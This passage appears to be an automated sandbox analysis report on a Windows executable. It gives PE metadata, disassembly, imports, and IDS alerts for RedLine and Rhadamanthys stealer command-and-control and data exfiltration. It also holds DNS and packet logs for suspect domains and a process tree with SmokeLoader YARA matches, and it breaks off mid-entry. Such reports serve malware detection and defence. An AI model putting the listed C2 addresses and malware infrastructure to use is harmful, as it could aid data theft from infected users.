                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x61CACEB1 [Tue Dec 28 08:45:37 2021 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:a73658074f4769fd7f1d57304e5f6853
                                                                                                                                      Instruction
                                                                                                                                      call 00007F28F0D81D7Bh
                                                                                                                                      jmp 00007F28F0D79B0Eh
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      mov edx, dword ptr [esp+0Ch]
                                                                                                                                      mov ecx, dword ptr [esp+04h]
                                                                                                                                      test edx, edx
                                                                                                                                      je 00007F28F0D79CFBh
                                                                                                                                      xor eax, eax
                                                                                                                                      mov al, byte ptr [esp+08h]
                                                                                                                                      test al, al
                                                                                                                                      jne 00007F28F0D79CA8h
                                                                                                                                      cmp edx, 00000100h
                                                                                                                                      jc 00007F28F0D79CA0h
                                                                                                                                      cmp dword ptr [02B97608h], 00000000h
                                                                                                                                      je 00007F28F0D79C97h
                                                                                                                                      jmp 00007F28F0D81E35h
                                                                                                                                      push edi
                                                                                                                                      mov edi, ecx
                                                                                                                                      cmp edx, 04h
                                                                                                                                      jc 00007F28F0D79CC3h
                                                                                                                                      neg ecx
                                                                                                                                      and ecx, 03h
                                                                                                                                      je 00007F28F0D79C9Eh
                                                                                                                                      sub edx, ecx
                                                                                                                                      mov byte ptr [edi], al
                                                                                                                                      add edi, 01h
                                                                                                                                      sub ecx, 01h
                                                                                                                                      jne 00007F28F0D79C88h
                                                                                                                                      mov ecx, eax
                                                                                                                                      shl eax, 08h
                                                                                                                                      add eax, ecx
                                                                                                                                      mov ecx, eax
                                                                                                                                      shl eax, 10h
                                                                                                                                      add eax, ecx
                                                                                                                                      mov ecx, edx
                                                                                                                                      and edx, 03h
                                                                                                                                      shr ecx, 02h
                                                                                                                                      je 00007F28F0D79C98h
                                                                                                                                      rep stosd
                                                                                                                                      test edx, edx
                                                                                                                                      je 00007F28F0D79C9Ch
                                                                                                                                      mov byte ptr [edi], al
                                                                                                                                      add edi, 01h
                                                                                                                                      sub edx, 01h
                                                                                                                                      jne 00007F28F0D79C88h
                                                                                                                                      mov eax, dword ptr [esp+08h]
                                                                                                                                      pop edi
                                                                                                                                      ret
                                                                                                                                      mov eax, dword ptr [esp+04h]
                                                                                                                                      ret
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                                                                                      mov ecx, dword ptr [ebp+10h]
                                                                                                                                      mov edi, dword ptr [ebp+08h]
                                                                                                                                      mov eax, ecx
                                                                                                                                      mov edx, ecx
                                                                                                                                      add eax, esi
                                                                                                                                      cmp edi, esi
                                                                                                                                      jbe 00007F28F0D79C9Ah
                                                                                                                                      cmp edi, eax
                                                                                                                                      jc 00007F28F0D79E3Ah
                                                                                                                                      cmp ecx, 00000100h
                                                                                                                                      jc 00007F28F0D79CB1h
                                                                                                                                      cmp dword ptr [02B97608h], 00000000h
                                                                                                                                      je 00007F28F0D79CA8h
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      and edi, 0Fh
                                                                                                                                      and esi, 0Fh
                                                                                                                                      cmp edi, esi
                                                                                                                                      Programming Language:
                                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                                      • [LNK] VS2008 build 21022
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x19b1c0x78.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x27980000x2a78.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x12500x1c.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5a800x40.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x204.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x197040x19800False0.5641084558823529data6.548052818508281IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x1b0000x277c6100x14400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x27980000x2a780x2c00False0.45561079545454547data4.150069416811535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                      RT_ICON0x27982200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SpanishMexico
                                                                                                                                      RT_ICON0x27988e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SpanishMexico
                                                                                                                                      RT_ICON0x2798e500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SpanishMexico
                                                                                                                                      RT_ICON0x2799ef80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SpanishMexico
                                                                                                                                      RT_STRING0x279a4f00xc0dataSpanishMexico
                                                                                                                                      RT_STRING0x279a5b00x228dataSpanishMexico
                                                                                                                                      RT_STRING0x279a7d80x29edataSpanishMexico
                                                                                                                                      RT_GROUP_ICON0x279a3600x3edataSpanishMexico
                                                                                                                                      RT_VERSION0x279a3a00x150data
                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.dllFindActCtxSectionStringW, CreateFileA, GetSystemWindowsDirectoryW, GlobalHandle, FindFirstVolumeMountPointW, CreateDirectoryExW, ReleaseActCtx, GetLogicalDriveStringsW, ReadConsoleInputA, GetComputerNameExW, GetTempPathA, GetCurrentDirectoryW, DebugBreak, LCMapStringW, GetProcAddress, GlobalAlloc, SetVolumeMountPointW, GetLastError, LoadLibraryW, SetCommMask, LocalUnlock, GetUserDefaultLangID, TerminateProcess, LocalFlags, GetModuleHandleA, GetConsoleAliasesLengthW, RegisterWaitForSingleObject, GlobalSize, OpenFileMappingW, lstrcmpW, ChangeTimerQueueTimer, SetConsoleScreenBufferSize, GetComputerNameW, lstrcpynW, SetConsoleCtrlHandler, CopyFileW, DosDateTimeToFileTime, QueryDosDeviceA, CreateActCtxW, DeleteVolumeMountPointW, MoveFileWithProgressA, PulseEvent, LocalReAlloc, WriteConsoleInputW, GetTempPathW, InterlockedCompareExchange, EnumTimeFormatsA, VerifyVersionInfoA, FindNextFileW, GetConsoleAliasA, FreeLibraryAndExitThread, GetNumberOfConsoleInputEvents, GetVolumePathNameA, LoadLibraryA, CloseHandle, HeapSize, ReadFile, WriteConsoleW, WideCharToMultiByte, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetStartupInfoW, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, VirtualAlloc, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, RaiseException, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                      USER32.dllGetCaretBlinkTime
                                                                                                                                      GDI32.dllGetBrushOrgEx, GetBoundsRect
                                                                                                                                      SHELL32.dllFindExecutableA
                                                                                                                                      MSIMG32.dllAlphaBlend
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      SpanishMexico
                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      109.206.243.168192.168.2.380497352853001 01/25/23-09:43:38.668137TCP2853001ETPRO TROJAN Rhadamanthys Stealer - Payload Response8049735109.206.243.168192.168.2.3
                                                                                                                                      192.168.2.3109.206.243.16849736802853002 01/25/23-09:44:09.970426TCP2853002ETPRO TROJAN Rhadamanthys Stealer - Data Exfil4973680192.168.2.3109.206.243.168
                                                                                                                                      192.168.2.3109.206.243.16849760802853002 01/25/23-09:44:49.715501TCP2853002ETPRO TROJAN Rhadamanthys Stealer - Data Exfil4976080192.168.2.3109.206.243.168
                                                                                                                                      192.168.2.389.208.103.8849733375382043231 01/25/23-09:43:35.518560TCP2043231ET TROJAN Redline Stealer TCP CnC Activity4973337538192.168.2.389.208.103.88
                                                                                                                                      192.168.2.3109.206.243.16849735802043202 01/25/23-09:43:38.621799TCP2043202ET TROJAN Rhadamanthys Stealer - Payload Download Request4973580192.168.2.3109.206.243.168
                                                                                                                                      192.168.2.389.208.103.8849733375382043233 01/25/23-09:43:14.099188TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init4973337538192.168.2.389.208.103.88
                                                                                                                                      89.208.103.88192.168.2.337538497332043234 01/25/23-09:43:16.162357TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response375384973389.208.103.88192.168.2.3
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jan 25, 2023 09:42:40.452477932 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.469746113 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.470160007 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.470671892 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.470772028 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.487663984 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.487689018 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.614130974 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.614201069 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.614464998 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.626651049 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.626651049 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.643986940 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.644038916 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.706640005 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.706765890 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.706834078 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.706881046 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.706888914 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.706928015 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.706935883 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.706974030 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707020998 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707029104 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.707067013 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707113028 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707168102 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.707355976 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707406044 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707415104 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.707477093 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707515955 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.707545996 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.752640963 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.752695084 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.752752066 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.752805948 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.752823114 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.752861977 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.752865076 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.752902031 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.752919912 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.753530979 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.753582001 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.753599882 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.753628969 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.753679037 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.753680944 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.754316092 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.754370928 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.754385948 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.754415989 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.754462957 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.754463911 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.755188942 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.755243063 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.755259037 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.755290031 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.755337000 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.755340099 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.756964922 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.757025003 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.757040024 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.757072926 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.757118940 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.757127047 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.757163048 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.757208109 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.757211924 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.757247925 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.757294893 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.799654961 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.799721003 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.799767971 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.799813986 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.799815893 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.799877882 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.799981117 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.800026894 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.800076008 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.800244093 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.800288916 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.800348043 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.800818920 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.800865889 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.800913095 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.800915956 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.800961971 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.801004887 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.801335096 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.801382065 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.801423073 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.801435947 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.801875114 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.801918030 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.801923990 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.801973104 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.802012920 CET4972880192.168.2.3188.114.97.3
                                                                                                                                      Jan 25, 2023 09:42:40.802020073 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:40.802566051 CET8049728188.114.97.3192.168.2.3
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jan 25, 2023 09:42:40.423273087 CET5238753192.168.2.38.8.8.8
                                                                                                                                      Jan 25, 2023 09:42:40.444751024 CET53523878.8.8.8192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:51.505464077 CET6062553192.168.2.38.8.8.8
                                                                                                                                      Jan 25, 2023 09:42:51.526386976 CET53606258.8.8.8192.168.2.3
                                                                                                                                      Jan 25, 2023 09:42:54.005945921 CET4930253192.168.2.38.8.8.8
                                                                                                                                      Jan 25, 2023 09:42:54.027677059 CET53493028.8.8.8192.168.2.3
                                                                                                                                      Jan 25, 2023 09:44:45.958540916 CET5604253192.168.2.38.8.8.8
                                                                                                                                      Jan 25, 2023 09:44:45.976910114 CET53560428.8.8.8192.168.2.3
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Jan 25, 2023 09:42:40.423273087 CET192.168.2.38.8.8.80x660eStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                                      Jan 25, 2023 09:42:51.505464077 CET192.168.2.38.8.8.80x75b7Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                      Jan 25, 2023 09:42:54.005945921 CET192.168.2.38.8.8.80xecc7Standard query (0)gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2sA (IP address)IN (0x0001)false
                                                                                                                                      Jan 25, 2023 09:44:45.958540916 CET192.168.2.38.8.8.80x10Standard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Jan 25, 2023 09:42:40.444751024 CET8.8.8.8192.168.2.30x660eNo error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                      Jan 25, 2023 09:42:40.444751024 CET8.8.8.8192.168.2.30x660eNo error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                      Jan 25, 2023 09:42:51.526386976 CET8.8.8.8192.168.2.30x75b7No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                                      Jan 25, 2023 09:42:54.027677059 CET8.8.8.8192.168.2.30xecc7Name error (3)gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2snonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Jan 25, 2023 09:44:45.976910114 CET8.8.8.8192.168.2.30x10No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                                                      • api.2ip.ua
                                                                                                                                      • transfer.sh
                                                                                                                                      • dipcj.net
                                                                                                                                        • potunulit.org
                                                                                                                                      • pdujeftq.com
                                                                                                                                      • lmkympntg.net
                                                                                                                                      • khpcnlkw.net
                                                                                                                                      • avuxv.net
                                                                                                                                      • hdmcxxriay.org
                                                                                                                                      • mgqyrb.net
                                                                                                                                      • efxdannslj.org
                                                                                                                                      • scyxiteu.org
                                                                                                                                      • opfakis.org
                                                                                                                                      • ntishu.org
                                                                                                                                      • biwrdybrv.net
                                                                                                                                      • 109.206.243.168

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:09:41:59
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\Desktop\aw9Ynwqd1x.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\Desktop\aw9Ynwqd1x.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:199680 bytes
                                                                                                                                      MD5 hash:B5C3C3D5EB5E6B5415AC4D87E3C46850
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.290595055.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.290961017.0000000002C60000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:09:42:08
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                      Imagebase:0x7ff69fe90000
                                                                                                                                      File size:3933184 bytes
                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:09:42:40
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\dbjigst
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\dbjigst
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:199680 bytes
                                                                                                                                      MD5 hash:B5C3C3D5EB5E6B5415AC4D87E3C46850
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.402603602.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.403103692.0000000002C80000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 85%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:09:42:41
                                                                                                                                      Start date:25/01/2023
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\336E.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\336E.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:417792 bytes
                                                                                                                                      MD5 hash:261B1DB94CCF4266128E2EB71A80FDA4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000E.00000002.577154071.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.577358269.0000000000678000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 81%, ReversingLabs
                                                                                                                                      Reputation:moderate

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:09:42:43
                                                                                                                                      Start date:25/01/2023
